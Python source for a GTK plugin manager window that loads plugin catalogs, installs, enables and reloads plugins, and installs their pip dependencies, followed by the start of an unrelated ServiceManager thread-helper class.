self.webview.load_markdown_file(self._md_file, template=self.template, template_vars={'plugin': self._plugin})
def signal_webview_open_remote_uri(self, webview, uri, decision):
utilities.open_uri(uri)
def signal_key_press_event(self, webview, event):
if event.type != Gdk.EventType.KEY_PRESS:
return
keyval = event.get_keyval()[1]
if keyval == Gdk.KEY_F5:
self.refresh()
class PluginManagerWindow(gui_utilities.GladeGObject):
"""
The window which allows the user to selectively enable and disable plugins
for the client application. This also handles configuration changes, so the
enabled plugins will persist across application runs.
"""
dependencies = gui_utilities.GladeDependencies(
children=(
'expander_info',
'grid_catalog_repo_info',
'grid_plugin_info',
'label_catalog_repo_info_description',
'label_catalog_repo_info_for_description',
'label_catalog_repo_info_for_maintainers',
'label_catalog_repo_info_homepage',
'label_catalog_repo_info_maintainers',
'label_catalog_repo_info_title',
'label_plugin_info_authors',
'label_plugin_info_compatible',
'label_plugin_info_description',
'label_plugin_info_for_classifiers',
'label_plugin_info_for_compatible',
'label_plugin_info_for_references',
'label_plugin_info_homepage',
'label_plugin_info_title',
'label_plugin_info_version',
'listbox_plugin_info_classifiers',
'listbox_plugin_info_references',
'menubutton_plugin_info',
'paned_plugins',
'scrolledwindow_plugins',
'stack_info',
'treeview_plugins',
'textview_plugin_info',
'viewport_info',
'statusbar'
)
)
top_gobject = 'window'
# todo: this _tsafe note should be clarified in the documentation
# methods defined within this class that are suffixed with _tsafe are safe
# to be called from a non-GUI thread and by extension only call fellow
# _tsafe methods
def __init__(self, *args, **kwargs):
super(PluginManagerWindow, self).__init__(*args, **kwargs)
self.catalog_plugins = plugins.ClientCatalogManager(self.application.user_data_path)
self.plugin_path = os.path.join(self.application.user_data_path, 'plugins')
self.status_bar = self.gobjects['statusbar']
self._installed_plugins_treeview_tracker = None
"""
This is used to track and make sure all plugins make it into the
treeview. It is set each time catalogs are loaded or refreshed. Once the
loading operation is complete, plugins that remain were not loaded due
their data (repo or id) missing from the catalog, likely due to it
having been removed.
"""
self._worker_thread = None
self._worker_thread_start(self._load_catalogs_tsafe)
self.__load_errors = {}
self.__installing_plugin = None
tvm = managers.TreeViewManager(self.gobjects['treeview_plugins'])
toggle_renderer_enable = Gtk.CellRendererToggle()
toggle_renderer_enable.connect('toggled', self.signal_renderer_toggled_enable)
toggle_renderer_install = Gtk.CellRendererToggle()
toggle_renderer_install.connect('toggled', self.signal_renderer_toggled_install)
tvm.set_column_titles(
('Installed', 'Enabled', 'Title', 'Compatible', 'Version'),
column_offset=1,
renderers=(
toggle_renderer_install,
toggle_renderer_enable,
Gtk.CellRendererText(),
Gtk.CellRendererText(),
Gtk.CellRendererText()
)
)
tvm.column_views['Enabled'].set_cell_data_func(toggle_renderer_enable, self._toggle_enabled_cell_data_func)
tvm.column_views['Enabled'].add_attribute(toggle_renderer_enable, 'sensitive', 1)
tvm.column_views['Enabled'].add_attribute(toggle_renderer_enable, 'visible', 6)
tvm.column_views['Installed'].set_cell_data_func(toggle_renderer_install, self._toggle_install_cell_data_func)
tvm.column_views['Installed'].add_attribute(toggle_renderer_install, 'visible', 7)
tvm.column_views['Installed'].add_attribute(toggle_renderer_install, 'sensitive', 8)
self._model = Gtk.TreeStore(str, bool, bool, str, str, str, bool, bool, bool, str)
self._model.set_sort_column_id(3, Gtk.SortType.ASCENDING)
self.gobjects['treeview_plugins'].set_model(self._model)
self._tv_popup_menu = managers.MenuManager(tvm.get_popup_menu())
self._tv_popup_menu.append_item(Gtk.SeparatorMenuItem())
self._tv_popup_menu.append('Reload', self.signal_popup_menu_activate_reload)
self._tv_popup_menu.append('Reload All', self.signal_popup_menu_activate_reload_all)
self._tv_popup_menu.append_item(Gtk.SeparatorMenuItem())
self._tv_popup_menu.append('Show Documentation', self.signal_popup_menu_activate_show_documentation)
self._tv_popup_menu.append('Update', self.signal_popup_menu_activate_update)
self._info_popup_menu = managers.MenuManager()
self._info_popup_menu.append('Reload', self.signal_popup_menu_activate_reload)
self._info_popup_menu.append_item(Gtk.SeparatorMenuItem())
self._info_popup_menu.append('Show Documentation', self.signal_popup_menu_activate_show_documentation)
self._info_popup_menu.append('Update', self.signal_popup_menu_activate_update)
self.gobjects['menubutton_plugin_info'].set_popup(self._info_popup_menu.menu)
self._update_status_bar('Loading...')
self.window.show()
paned = self.gobjects['paned_plugins']
self._paned_offset = paned.get_allocation().height - paned.get_position()
def __store_add_node(self, node, parent=None):
"""
Add a :py:class:`._ModelNode` to :py:attr:`._model`, recursively adding
child :py:class:`._ModelNode` or :py:class:`._ModelNamedRow` instances as
necessary. This is *not* tsafe.
:param node: The node to add to the TreeView model.
:type node: :py:class:`._ModelNode`
:param parent: An optional parent for the node, used for recursion.
"""
row = self._model.append(parent, node.row)
for child in node.children:
if isinstance(child, _ModelNode):
self.__store_add_node(child, parent=row)
elif isinstance(child, _ModelNamedRow):
self._model.append(row, child)
else:
raise TypeError('unsupported node child type')
def _add_catalog_to_tree_tsafe(self, catalog):
"""
Create a :py:class:`._ModelNode` instance to representing the catalog, its
data and add it to the TreeView model.
:param catalog: The catalog to add to the TreeView.
:type catalog: :py:class:`.Catalog`
"""
catalog_node = _ModelNode(
id=catalog.id,
installed=None,
enabled=True,
title=catalog.id,
compatibility=None,
version=None,
visible_enabled=False,
visible_installed=False,
sensitive_installed=False,
type=_ROW_TYPE_CATALOG
)
for repo in catalog.repositories.values():
repo_node = _ModelNode(
id=repo.id,
installed=None,
enabled=True,
title=repo.title,
compatibility=None,
version=None,
visible_enabled=False,
visible_installed=False,
sensitive_installed=False,
type=_ROW_TYPE_REPOSITORY
)
catalog_node.children.append(repo_node)
plugin_collection = self.catalog_plugins.get_collection(catalog.id, repo.id)
for plugin_info in plugin_collection.values():
installed = False
enabled = False
plugin_name = plugin_info['name']
install_src = self.config['plugins.installed'].get(plugin_name)
if install_src and repo.id == install_src['repo_id'] and catalog.id == install_src['catalog_id']:
installed = True
# plugin was added to treeview so it is removed from the temporary tracking dict
self._installed_plugins_treeview_tracker.pop(plugin_name)
enabled = plugin_name in self.config['plugins.enabled']
repo_node.children.append(_ModelNamedRow(
id=plugin_name,
installed=installed,
enabled=enabled,
title=plugin_info['title'],
compatibility='Yes' if self.catalog_plugins.is_compatible(catalog.id, repo.id, plugin_name) else 'No',
version=plugin_info['version'],
visible_enabled=True,
visible_installed=True,
sensitive_installed=True,
type=_ROW_TYPE_PLUGIN
))
gui_utilities.glib_idle_add_once(self.__store_add_node, catalog_node)
def _get_plugin_model_parents(self, plugin_model_row):
return _ModelNamedRow(*plugin_model_row.parent), _ModelNamedRow(*plugin_model_row.parent.parent)
def _on_plugin_load_error_tsafe(self, name, error):
# WARNING: this may not be called from the GUI thread
self.__load_errors[name] = (error, traceback.format_exception(*sys.exc_info(), limit=5))
def _pip_install(self, packages):
options = ['--no-color']
if self.application.user_library_path is None:
self.logger.warning('can not install packages with out a defined library path')
return
options.extend(['--target', self.application.user_library_path])
args = [sys.executable, '-m', 'pip', 'install'] + options + packages
return startup.run_process(args)
def _plugin_disable(self, model_row):
named_row = _ModelNamedRow(*model_row)
self.application.plugin_manager.disable(named_row.id)
self.config['plugins.enabled'].remove(named_row.id)
model_row[_ModelNamedRow._fields.index('enabled')] = False
def _plugin_enable(self, model_row):
named_row = _ModelNamedRow(*model_row)
pm = self.application.plugin_manager
if not pm.loaded_plugins[named_row.id].is_compatible:
gui_utilities.show_dialog_error('Incompatible Plugin', self.window, 'This plugin is not compatible.')
return
if not pm.enable(named_row.id):
return
self._set_model_item(model_row.path, 'enabled', True)
self.config['plugins.enabled'].append(named_row.id)
def _plugin_install(self, model_row):
if not self._worker_thread_is_ready:
# check it here to fail fast, then self._worker_thread_start checks it again later
self._show_dialog_busy()
return
named_row = _ModelNamedRow(*model_row)
repo_model, catalog_model = self._get_plugin_model_parents(model_row)
if named_row.id in self.config['plugins.installed']:
plugin_src = self.config['plugins.installed'].get(named_row.id)
if plugin_src != {'catalog_id': catalog_model.id, 'repo_id': repo_model.id, 'plugin_id': named_row.id}:
window_question = 'A plugin with this name is already installed from another\nrepository. Do you want to replace it with this one?'
if not gui_utilities.show_dialog_yes_no('Plugin Already Installed', self.window, window_question):
return
if not self._remove_matching_plugin(named_row, plugin_src):
self.logger.warning("failed to uninstall plugin {0}".format(named_row.id))
return
self._worker_thread_start(self._plugin_install_tsafe, catalog_model, repo_model, model_row, named_row)
def _plugin_install_tsafe(self, catalog_model, repo_model, model_row, named_row):
self.__installing_plugin = named_row.id
self.logger.debug("installing plugin '{0}'".format(named_row.id))
self._update_status_bar_tsafe("Installing plugin {}...".format(named_row.title))
_show_dialog_error_tsafe = functools.partial(gui_utilities.glib_idle_add_once, gui_utilities.show_dialog_error, 'Failed To Install', self.window)
try:
self.catalog_plugins.install_plugin(catalog_model.id, repo_model.id, named_row.id, self.plugin_path)
except requests.exceptions.ConnectionError:
self.logger.warning("failed to download plugin {}".format(named_row.id))
_show_dialog_error_tsafe("Failed to download {} plugin, check your internet connection.".format(named_row.id))
self._update_status_bar_tsafe("Installing plugin {} failed.".format(named_row.title))
self.__installing_plugin = None
return
except Exception:
self.logger.warning("failed to install plugin {}".format(named_row.id), exc_info=True)
_show_dialog_error_tsafe("Failed to install {} plugin.".format(named_row.id))
self._update_status_bar_tsafe("Installing plugin {} failed.".format(named_row.title))
self.__installing_plugin = None
return
self.config['plugins.installed'][named_row.id] = {'catalog_id': catalog_model.id, 'repo_id': repo_model.id, 'plugin_id': named_row.id}
self.logger.info("installed plugin '{}' from catalog:{}, repository:{}".format(named_row.id, catalog_model.id, repo_model.id))
plugin = self._reload_plugin_tsafe(model_row, named_row)
if self.config['plugins.pip.install_dependencies']:
packages = smoke_zephyr.requirements.check_requirements(tuple(plugin.req_packages.keys()))
if packages:
self.logger.debug("installing missing or incompatible packages from PyPi for plugin '{0}'".format(named_row.id))
self._update_status_bar_tsafe(
"Installing {:,} dependenc{} for plugin {} from PyPi.".format(len(packages), 'y' if len(packages) == 1 else 'ies', named_row.title)
)
pip_results = self._pip_install(packages)
if pip_results is None:
self.logger.warning('pip install failed')
_show_dialog_error_tsafe(
"Failed to run pip to install package(s) for plugin {}.".format(named_row.id)
)
elif pip_results.status:
self.logger.warning('pip install failed, exit status: ' + str(pip_results.status))
_show_dialog_error_tsafe(
"Failed to install pip package(s) for plugin {}.".format(named_row.id)
)
else:
plugin = self._reload_plugin_tsafe(model_row, named_row)
self.__installing_plugin = None
gui_utilities.glib_idle_add_once(self.__plugin_install_post, catalog_model, repo_model, model_row, named_row)
def __plugin_install_post(self, catalog_model, repo_model, model_row, named_row):
# handles GUI related updates after data has been fetched from the internet
if model_row.path is not None:
self._set_model_item(model_row.path, 'installed', True)
self._set_model_item(model_row.path, 'version', self.catalog_plugins.get_collection(catalog_model.id, repo_model.id)[named_row.id]['version'])
if self._selected_model_row.path == model_row.path:
self._popup_menu_refresh(model_row)
self._update_status_bar("Finished installing plugin {}.".format(named_row.title))
def _plugin_uninstall(self, model_row):
named_row = _ModelNamedRow(*model_row)
if not self.application.plugin_manager.uninstall(named_row.id):
return False
del self.config['plugins.installed'][named_row.id]
if model_row.parent and model_row.parent[_ModelNamedRow._fields.index('id')] == _LOCAL_REPOSITORY_ID:
del self._model[model_row.path]
else:
self._set_model_item(model_row.path, 'installed', False)
self.logger.info("successfully uninstalled plugin {0}".format(named_row.id))
self._update_status_bar("Finished uninstalling plugin {}.".format(named_row.title))
return True
def _popup_menu_refresh(self, model_row):
named_row = _ModelNamedRow(*model_row)
sensitive = named_row.type == _ROW_TYPE_PLUGIN and named_row.installed
self._info_popup_menu['Show Documentation'].set_property('sensitive', sensitive)
self._tv_popup_menu['Show Documentation'].set_property('sensitive', sensitive)
sensitive = named_row.type == _ROW_TYPE_PLUGIN and named_row.installed and named_row.sensitive_installed
self._info_popup_menu['Update'].set_property('sensitive', sensitive)
self._tv_popup_menu['Update'].set_property('sensitive', sensitive)
def _reload(self):
model_row = self._selected_model_row
named_row = _ModelNamedRow(*model_row)
if named_row.type == _ROW_TYPE_CATALOG:
self._worker_thread_start(self._reload_catalog_tsafe, model_row, named_row)
elif named_row.type == _ROW_TYPE_REPOSITORY:
# this just reloads the entire parent catalog, individual repositories
# can not be reloaded at this time
parent_model_row = model_row.parent
parent_named_row = _ModelNamedRow(*parent_model_row)
if parent_named_row.type != _ROW_TYPE_CATALOG:
self.logger.warning('repository treeview row\'s parent is not a catalog')
return
self._worker_thread_start(self._reload_catalog_tsafe, parent_model_row, parent_named_row)
elif named_row.type == _ROW_TYPE_PLUGIN:
if not named_row.installed:
return
self._worker_thread_start(self._reload_plugin_tsafe, model_row, named_row)
else:
self.logger.warning('reload selected for an unsupported row type')
def _reload_catalog_tsafe(self, model_row, named_row):
self._update_status_bar_tsafe('Reloading catalog...')
self._model.remove(model_row.iter)
if named_row.id == _LOCAL_REPOSITORY_ID:
self._load_catalog_local_tsafe()
else:
catalog_url = self.catalog_plugins.get_cache().get_catalog_by_id(named_row.id)['url']
if catalog_url:
self._load_catalog_from_url_tsafe(catalog_url)
self._update_status_bar_tsafe('Reloading catalog... completed.')
def _reload_plugin_tsafe(self, model_row, named_row, enabled=None):
self._update_status_bar_tsafe('Reloading plugin...')
pm = self.application.plugin_manager
if enabled is None:
enabled = named_row.id in pm.enabled_plugins
pm.unload(named_row.id)
try:
klass = pm.load(named_row.id, reload_module=True)
except Exception as error:
self._on_plugin_load_error_tsafe(named_row.id, error)
klass = None
else:
if enabled:
pm.enable(named_row.id)
self.__load_errors.pop(named_row.id, None)
gui_utilities.glib_idle_add_once(self.__reload_plugin_post, model_row, named_row, klass)
return klass
def __reload_plugin_post(self, model_row, named_row, klass=None):
if model_row.path is not None:
if named_row.id == self._selected_named_row.id:
self._set_info(model_row)
if klass is None:
self._set_model_item(model_row.path, 'title', "{0} (Reload Failed)".format(named_row.id))
else:
self._set_model_item(model_row.path, 'title', klass.title)
self._set_model_item(model_row.path, 'compatibility', 'Yes' if klass.is_compatible else 'No')
self._set_model_item(model_row.path, 'version', klass.version)
self._update_status_bar('Reloading plugin... completed.')
def _remove_matching_plugin(self, named_row, plugin_src):
repo_model = None
for catalog_model in self._model:
catalog_id = _ModelNamedRow(*catalog_model).id
if plugin_src and catalog_id == plugin_src['catalog_id']:
repo_model = next((rm for rm in catalog_model.iterchildren() if _ModelNamedRow(*rm).id == plugin_src['repo_id']), None)
break
elif plugin_src is None and catalog_id == _LOCAL_REPOSITORY_ID:
# local installation acts as a pseudo-repository
repo_model = catalog_model
break
if not repo_model:
return False
for plugin_model_row in repo_model.iterchildren():
named_model = _ModelNamedRow(*plugin_model_row)
if named_model.id != named_row.id:
continue
if named_model.enabled:
self._plugin_disable(plugin_model_row)
self._plugin_uninstall(plugin_model_row)
return True
return False
@property
def _selected_model_row(self):
treeview = self.gobjects['treeview_plugins']
selection = treeview.get_selection()
if not selection.count_selected_rows():
return None
(model, tree_paths) = selection.get_selected_rows()
return model[tree_paths[0]]
@property
def _selected_named_row(self):
model_row = self._selected_model_row
return _ModelNamedRow(*model_row) if model_row else None
def _set_model_item(self, model_path, item, item_value):
self._model[model_path][_ModelNamedRow._fields.index(item)] = item_value
def _set_info(self, model_instance):
named_model = _ModelNamedRow(*model_instance)
stack = self.gobjects['stack_info']
textview = self.gobjects['textview_plugin_info']
buf = textview.get_buffer()
buf.delete(buf.get_start_iter(), buf.get_end_iter())
model_id = named_model.id
if named_model.type == _ROW_TYPE_PLUGIN:
if model_id in self.__load_errors:
stack.set_visible_child(textview)
self._set_info_plugin_error(model_instance)
else:
stack.set_visible_child(self.gobjects['grid_plugin_info'])
self._set_info_plugin(model_instance)
else:
self._set_info_nonplugin(model_instance)
def _set_info_nonplugin(self, model_instance):
stack = self.gobjects['stack_info']
stack.set_visible_child(self.gobjects['grid_catalog_repo_info'])
named_model = _ModelNamedRow(*model_instance)
obj_catalog = None
# hide catalog repo labels
self.gobjects['label_catalog_repo_info_maintainers'].set_property('visible', False)
self.gobjects['label_catalog_repo_info_for_maintainers'].set_property('visible', False)
self.gobjects['label_catalog_repo_info_description'].set_property('visible', False)
self.gobjects['label_catalog_repo_info_for_description'].set_property('visible', False)
self.gobjects['label_catalog_repo_info_homepage'].set_property('visible', False)
self.gobjects['label_catalog_repo_info_title'].set_text(named_model.title)
if not named_model.id:
return
if named_model.type == _ROW_TYPE_CATALOG:
obj = self.catalog_plugins.catalogs.get(named_model.id, None)
if not obj:
return
else:
obj_catalog = self.catalog_plugins.catalogs.get(_ModelNamedRow(*model_instance.parent).id, None)
if not obj_catalog:
return
obj = self.catalog_plugins.catalogs[_ModelNamedRow(*model_instance.parent).id].repositories[named_model.id]
maintainers = getattr(obj, 'maintainers', getattr(obj_catalog, 'maintainers', None))
if maintainers:
self.gobjects['label_catalog_repo_info_maintainers'].set_text('\n'.join(maintainers))
self.gobjects['label_catalog_repo_info_maintainers'].set_property('visible', True)
self.gobjects['label_catalog_repo_info_for_maintainers'].set_property('visible', True)
if getattr(obj, 'description', None):
self.gobjects['label_catalog_repo_info_description'].set_text(obj.description)
self.gobjects['label_catalog_repo_info_description'].set_property('visible', True)
self.gobjects['label_catalog_repo_info_for_description'].set_property('visible', True)
if getattr(obj, 'homepage', None) or getattr(obj, 'url', None):
url = getattr(obj, 'homepage', getattr(obj, 'url', None))
self.gobjects['label_catalog_repo_info_homepage'].set_markup("<a href=\"{0}\">Homepage</a>".format(url.replace('"', '"')))
self.gobjects['label_catalog_repo_info_homepage'].set_property('tooltip-text', url)
self.gobjects['label_catalog_repo_info_homepage'].set_property('visible', True)
def _set_info_plugin(self, plugin_model):
named_model = _ModelNamedRow(*plugin_model)
pm = self.application.plugin_manager
self._last_plugin_selected = plugin_model
if named_model.id in pm.loaded_plugins:
plugin = pm.loaded_plugins[named_model.id].metadata
is_compatible = plugin['is_compatible']
else:
repo_model, catalog_model = self._get_plugin_model_parents(plugin_model)
plugin = self.catalog_plugins.get_collection(catalog_model.id, repo_model.id)[named_model.id]
is_compatible = self.catalog_plugins.is_compatible(catalog_model.id, repo_model.id, named_model.id)
self.gobjects['label_plugin_info_title'].set_text(plugin['title'])
self.gobjects['label_plugin_info_compatible'].set_text('Yes' if is_compatible else 'No')
self.gobjects['label_plugin_info_version'].set_text(plugin['version'])
self.gobjects['label_plugin_info_authors'].set_text('\n'.join(plugin['authors']))
self.gobjects['label_plugin_info_description'].set_text(plugin['description'])
self._set_info_plugin_homepage_url(plugin['homepage'])
self._set_info_plugin_reference_urls(plugin.get('reference_urls', []))
classifiers = plugin.get('classifiers', [])
if classifiers:
self.gobjects['label_plugin_info_for_classifiers'].set_property('visible', True)
gui_utilities.gtk_listbox_populate_labels(
self.gobjects['listbox_plugin_info_classifiers'],
classifiers
)
else:
self.gobjects['label_plugin_info_for_classifiers'].set_property('visible', False)
def _set_info_plugin_error(self, model_instance):
id_ = _ModelNamedRow(*model_instance).id
textview = self.gobjects['textview_plugin_info']
buf = textview.get_buffer()
exc, formatted_exc = self.__load_errors[id_]
buf.insert(buf.get_end_iter(), "{0!r}\n\n".format(exc), -1)
buf.insert(buf.get_end_iter(), ''.join(formatted_exc), -1)
def _set_info_plugin_homepage_url(self, url=None):
label_homepage = self.gobjects['label_plugin_info_homepage']
if url is None:
label_homepage.set_property('visible', False)
return
label_homepage.set_markup("<a href=\"{0}\">Homepage</a>".format(url.replace('"', '"')))
label_homepage.set_property('tooltip-text', url)
label_homepage.set_property('visible', True)
def _set_info_plugin_reference_urls(self, reference_urls):
label = self.gobjects['label_plugin_info_for_references']
listbox = self.gobjects['listbox_plugin_info_references']
gui_utilities.gtk_widget_destroy_children(listbox)
if not reference_urls:
label.set_property('visible', False)
listbox.set_property('visible', False)
return
label.set_property('visible', True)
listbox.set_property('visible', True)
for reference_url in reference_urls:
label = Gtk.Label()
label.connect('activate-link', self.signal_label_activate_link)
label.set_markup("<a href=\"{0}\">{1}</a>".format(reference_url.replace('"', '"'), saxutils.escape(reference_url)))
label.set_property('halign', Gtk.Align.START)
label.set_property('track-visited-links', False)
label.set_property('use-markup', True)
label.set_property('valign', Gtk.Align.START)
label.set_property('visible', True)
listbox.add(label)
def _show_dialog_busy(self):
gui_utilities.show_dialog_warning('Currently Busy', self.window, 'An operation is already running.')
def _show_dialog_error_tsafe(self, title, message):
gui_utilities.glib_idle_add_once(gui_utilities.show_dialog_error, title, self.window, message)
def _toggle_enabled_cell_data_func(self, column, cell, model, tree_iter, _):
if model.get_value(tree_iter, 0) in self.__load_errors:
cell.set_property('inconsistent', True)
else:
cell.set_property('inconsistent', False)
def _toggle_install_cell_data_func(self, column, cell, model, tree_iter, _):
cell.set_property('inconsistent', model.get_value(tree_iter, 0) == self.__installing_plugin)
def _update_status_bar(self, string_to_set):
self.status_bar.pop(0)
self.status_bar.push(0, string_to_set)
def _update_status_bar_tsafe(self, string_to_set):
gui_utilities.glib_idle_add_once(self._update_status_bar, string_to_set)
def _worker_thread_start(self, target, *args, **kwargs):
"""
Start a worker thread. This must only be called from the main GUI thread
and *target* must be a tsafe method.
"""
if not self._worker_thread_is_ready:
self._show_dialog_busy()
self.logger.debug('plugin manager worker thread is alive, can not start a new one')
return False
self._worker_thread = utilities.Thread(target=target, args=args, kwargs=kwargs)
self._worker_thread.start()
return True
@property
def _worker_thread_is_ready(self):
return self._worker_thread is None or not self._worker_thread.is_alive()
#
# Catalog Loading Methods
#
# Each of these functions loads the catalog and handles add it to the
# TreeView as necessary.
#
def _load_catalogs_tsafe(self, refresh=False):
self._installed_plugins_treeview_tracker = copy.deepcopy(self.config['plugins.installed'])
for plugin in list(self._installed_plugins_treeview_tracker.keys()):
# Remove plugins already found to be locally installed.
if not self._installed_plugins_treeview_tracker[plugin]:
self._installed_plugins_treeview_tracker.pop(plugin)
if refresh:
gui_utilities.glib_idle_add_once(self._model.clear)
expiration = datetime.timedelta(seconds=smoke_zephyr.utilities.parse_timespan(self.config.get('cache.age', '4h')))
self._update_status_bar_tsafe('Loading, catalogs...')
self._load_catalog_local_tsafe()
catalog_cache = self.catalog_plugins.get_cache()
now = datetime.datetime.utcnow()
for catalog_url in self.config['catalogs']:
catalog_cache_dict = catalog_cache.get_catalog_by_url(catalog_url)
if not refresh and catalog_cache_dict and catalog_cache_dict['created'] + expiration > now:
catalog = self._load_catalog_from_cache_tsafe(catalog_cache_dict)
if catalog is not None:
continue
catalog_cache_dict = None
self.logger.debug("downloading catalog: {}".format(catalog_url))
self._update_status_bar_tsafe("Loading, downloading catalog: {}".format(catalog_url))
catalog = self._load_catalog_from_url_tsafe(catalog_url)
if catalog is None and catalog_cache_dict is not None:
self.logger.warning('failing over to loading the catalog from the cache')
self._load_catalog_from_cache_tsafe(catalog_cache_dict)
if self._installed_plugins_treeview_tracker:
self._load_missing_plugins_tsafe()
self._update_status_bar_tsafe('Loading completed')
self._installed_plugins_treeview_tracker = None
def _load_missing_plugins_tsafe(self):
local_model_row = None
for plugin in self._installed_plugins_treeview_tracker.keys():
self.logger.warning("plugin {} was not found in any loaded catalog or repo, moving to locally installed".format(plugin))
self.config['plugins.installed'][plugin] = None
self._installed_plugins_treeview_tracker[plugin] = None
for model_row in self._model:
if _ModelNamedRow(*model_row).id == _LOCAL_REPOSITORY_ID:
gui_utilities.glib_idle_add_wait(self._model.remove, model_row.iter)
break
else:
raise RuntimeError('failed to find the local plugin repository')
self._load_catalog_local_tsafe()
def _load_catalog_from_cache_tsafe(self, catalog_cache_dict):
catalog = None
try:
catalog = Catalog(catalog_cache_dict['value'])
except (KeyError, TypeError) as error:
self.logger.warning("{0} error when trying to add catalog dict to manager".format(error.__class__.__name))
else:
self.catalog_plugins.add_catalog(catalog, catalog_url=catalog_cache_dict['url'], cache=False)
self._add_catalog_to_tree_tsafe(catalog)
return catalog
def _load_catalog_from_url_tsafe(self, catalog_url):
catalog = None
try:
catalog = Catalog.from_url(catalog_url)
except requests.exceptions.ConnectionError:
self.logger.warning("connection error trying to download catalog url: {}".format(catalog_url))
self._show_dialog_error_tsafe('Catalog Loading Error', 'Failed to download catalog, check your internet connection.')
except Exception:
self.logger.warning('failed to add catalog by url: ' + catalog_url, exc_info=True)
self._show_dialog_error_tsafe('Catalog Loading Error', 'Failed to add catalog')
else:
self.catalog_plugins.add_catalog(catalog, catalog_url=catalog_url, cache=True)
self._add_catalog_to_tree_tsafe(catalog)
return catalog
def _load_catalog_local_tsafe(self):
"""
Load the plugins which are available into the treeview to make them
visible to the user.
"""
self.logger.debug('loading the local catalog')
pm = self.application.plugin_manager
self.__load_errors = {}
pm.load_all(on_error=self._on_plugin_load_error_tsafe)
node = _ModelNode(
id=_LOCAL_REPOSITORY_ID,
installed=None,
enabled=True,
title=_LOCAL_REPOSITORY_TITLE,
compatibility=None,
version=None,
visible_enabled=False,
visible_installed=False,
sensitive_installed=False,
type=_ROW_TYPE_CATALOG
)
for name, plugin in pm.loaded_plugins.items():
if self.config['plugins.installed'].get(name):
continue
self.config['plugins.installed'][name] = None
node.children.append(_ModelNamedRow(
id=plugin.name,
installed=True,
enabled=plugin.name in pm.enabled_plugins,
title=plugin.title,
compatibility='Yes' if plugin.is_compatible else 'No',
version=plugin.version,
visible_enabled=True,
visible_installed=True,
sensitive_installed=False,
type=_ROW_TYPE_PLUGIN
))
for name in self.__load_errors.keys():
node.children.append(_ModelNamedRow(
id=name,
installed=True,
enabled=False,
title="{0} (Load Failed)".format(name),
compatibility='No',
version='Unknown',
visible_enabled=True,
visible_installed=True,
sensitive_installed=False,
type=_ROW_TYPE_PLUGIN
))
gui_utilities.glib_idle_add_wait(self.__store_add_node, node)
#
# Signal Handlers
#
def signal_eventbox_button_press(self, widget, event):
if not (event.type == Gdk.EventType.BUTTON_PRESS and event.button == Gdk.BUTTON_PRIMARY):
return
if not self._last_plugin_selected:
return
named_plugin = _ModelNamedRow(*self._last_plugin_selected)
plugin_id = named_plugin.id
if plugin_id is None:
return
if plugin_id in self.application.plugin_manager:
klass = self.application.plugin_manager[plugin_id]
compatibility_details = list(klass.compatibility)
else:
repo_model, catalog_model = self._get_plugin_model_parents(self._last_plugin_selected)
compatibility_details = list(self.catalog_plugins.compatibility(catalog_model.id, repo_model.id, named_plugin.id))
popover = Gtk.Popover()
popover.set_relative_to(self.gobjects['label_plugin_info_for_compatible'])
grid = Gtk.Grid()
popover.add(grid)
grid.insert_column(0)
grid.insert_column(0)
grid.insert_column(0)
grid.set_column_spacing(3)
compatibility_details.insert(0, ('Type', 'Value', 'Met'))
row = 0
for row, req in enumerate(compatibility_details):
grid.insert_row(row)
label = Gtk.Label(req[0])
label.set_property('halign', Gtk.Align.START)
grid.attach(label, 0, row, 1, 1)
label = Gtk.Label(req[1])
label.set_property('halign', Gtk.Align.START)
grid.attach(label, 1, row, 1, 1)
label = Gtk.Label(('Yes' if req[2] else 'No') if row else req[2])
label.set_property('halign', Gtk.Align.END)
grid.attach(label, 2, row, 1, 1)
if not row:
popover.destroy()
return
popover.show_all()
def signal_expander_activate(self, expander):
paned = self.gobjects['paned_plugins']
if expander.get_property('expanded'): # collapsing
paned.set_position(paned.get_allocation().height + self._paned_offset)
def signal_label_activate_link(self, _, uri):
utilities.open_uri(uri)
def signal_paned_button_press_event(self, paned, event):
return not self.gobjects['expander_info'].get_property('expanded')
def signal_popup_menu_activate_reload(self, _):
self._reload()
def signal_popup_menu_activate_reload_all(self, _):
self._worker_thread_start(self._load_catalogs_tsafe, refresh=True)
def signal_popup_menu_activate_show_documentation(self, _):
named_row = self._selected_named_row
if named_row is None or named_row.type != _ROW_TYPE_PLUGIN:
return
if not named_row.installed:
gui_utilities.show_dialog_warning('No Documentation', self.window, 'This plugin has no documentation.')
return
try:
PluginDocumentationWindow(self.application, named_row.id)
except FileNotFoundError as error:
self.logger.warning(error.strerror)
gui_utilities.show_dialog_warning('No Documentation', self.window, error.strerror.capitalize() + '.')
def signal_popup_menu_activate_update(self, _):
model_row = self._selected_model_row
named_row = None if model_row is None else _ModelNamedRow(*model_row)
if named_row is None:
return
if not (named_row.type == _ROW_TYPE_PLUGIN and named_row.installed and named_row.sensitive_installed):
return
if not self._plugin_uninstall(model_row):
gui_utilities.show_dialog_error('Update Failed', self.window, 'Failed to uninstall the existing plugin data.')
return
self._plugin_install(model_row)
def signal_renderer_toggled_enable(self, _, path):
model_row = self._model[path]
named_row = _ModelNamedRow(*model_row)
if named_row.type != _ROW_TYPE_PLUGIN:
return
if named_row.id not in self.application.plugin_manager.loaded_plugins:
return
if named_row.id in self.__load_errors:
gui_utilities.show_dialog_error('Can Not Enable Plugin', self.window, 'Can not enable a plugin which failed to load.')
return
if named_row.enabled:
self._plugin_disable(model_row)
else:
self._plugin_enable(model_row)
def signal_renderer_toggled_install(self, _, path):
model_row = self._model[path]
named_row = _ModelNamedRow(*model_row)
if named_row.type == _ROW_TYPE_PLUGIN and named_row.installed:
self._plugin_uninstall(model_row)
else:
self._plugin_install(model_row)
if named_row.enabled:
self._plugin_enable(model_row)
def signal_treeview_row_activated(self, treeview, path, column):
model_row = self._model[path]
self._set_info(model_row)
self._popup_menu_refresh(model_row)
|
ServiceManager.py
|
import threading
from time import sleep
# ------------------------------------------------------------------
class ServiceManager():
"""keep track of all threads spawned in this proccess, and enable interruption
"""
threads = []
def __init__(self, service_name, *args, **kwargs):
# if service_name is None:
# return
# sleep duration for heartbeat loop of active instance
self.active_expire_sec = 5
self.loop_active_expire_sec = self.active_expire_sec * 0.25
self.active_instance_name = self.get_active_name(service_name)
return
# ------------------------------------------------------------------
@classmethod
def get_active_name(self, service_name):
return 'utils;active_instance;' + service_name
# ------------------------------------------------------------------
def can_loop(self, interrupt_sig=None):
"""check if the interrups signal has been set
"""
if interrupt_sig is None:
return not self.interrupt_sig.is_set()
else:
return not interrupt_sig.is_set()
